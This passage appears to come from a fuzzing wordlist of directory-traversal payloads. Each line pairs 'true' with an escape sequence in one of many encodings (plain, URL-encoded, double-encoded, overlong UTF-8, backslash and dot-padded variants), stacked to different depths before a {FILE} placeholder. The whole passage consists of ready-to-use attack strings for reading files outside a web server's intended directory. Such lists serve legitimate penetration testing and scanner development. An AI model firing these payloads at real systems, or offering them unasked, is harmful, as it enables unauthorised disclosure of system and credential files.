"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,..%%32%66{FILE}",
"true,..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,..%%35%63{FILE}",
"true,..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,../{FILE}",
"true,../../{FILE}",
"true,../../../{FILE}",
"true,../../../../{FILE}",
"true,../../../../../{FILE}",
"true,../../../../../../{FILE}",
"true,../../../../../../../{FILE}",
"true,../../../../../../../../{FILE}",
"true,..%2f{FILE}",
"true,..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,..%252f{FILE}",
"true,..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,..\\{FILE}",
"true,..\\..\\{FILE}",
"true,..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..%5c{FILE}",
"true,..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,..%255c{FILE}",
"true,..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,../{FILE}",
"true,../../{FILE}",
"true,../../../{FILE}",
"true,../../../../{FILE}",
"true,../../../../../{FILE}",
"true,../../../../../../{FILE}",
"true,../../../../../../../{FILE}",
"true,../../../../../../../../{FILE}",
"true,..%2f{FILE}",
"true,..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,..%252f{FILE}",
"true,..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,..\\{FILE}",
"true,..\\..\\{FILE}",
"true,..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..%5c{FILE}",
"true,..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,..%255c{FILE}",
"true,..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,\\../{FILE}",
"true,\\../\\../{FILE}",
"true,\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../\\../\\../\\../\\../{FILE}",
"true,/..\\{FILE}",
"true,/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
"true,.../{FILE}",
"true,.../.../{FILE}",
"true,.../.../.../{FILE}",
"true,.../.../.../.../{FILE}",
"true,.../.../.../.../.../{FILE}",
"true,.../.../.../.../.../.../{FILE}",
"true,.../.../.../.../.../.../.../{FILE}",
"true,.../.../.../.../.../.../.../.../{FILE}",
"true,...\\{FILE}",
"true,...\\...\\{FILE}",
"true,...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\...\\...\\...\\...\\{FILE}",
"true,..../{FILE}",
"true,..../..../{FILE}",
"true,..../..../..../{FILE}",
"true,..../..../..../..../{FILE}",
"true,..../..../..../..../..../{FILE}",
"true,..../..../..../..../..../..../{FILE}",
"true,..../..../..../..../..../..../..../{FILE}",
"true,..../..../..../..../..../..../..../..../{FILE}",
"true,....\\{FILE}",
"true,....\\....\\{FILE}",
"true,....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\....\\....\\....\\....\\{FILE}",
"true,........................................................................../{FILE}",
"true,........................................................................../../{FILE}",
"true,........................................................................../../../{FILE}",
"true,........................................................................../../../../{FILE}",
"true,........................................................................../../../../../{FILE}",
"true,........................................................................../../../../../../{FILE}",
"true,........................................................................../../../../../../../{FILE}",
"true,........................................................................../../../../../../../../{FILE}",
"true,..........................................................................\\{FILE}",
"true,..........................................................................\\..\\{FILE}",
"true,..........................................................................\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\..\\{FILE}",
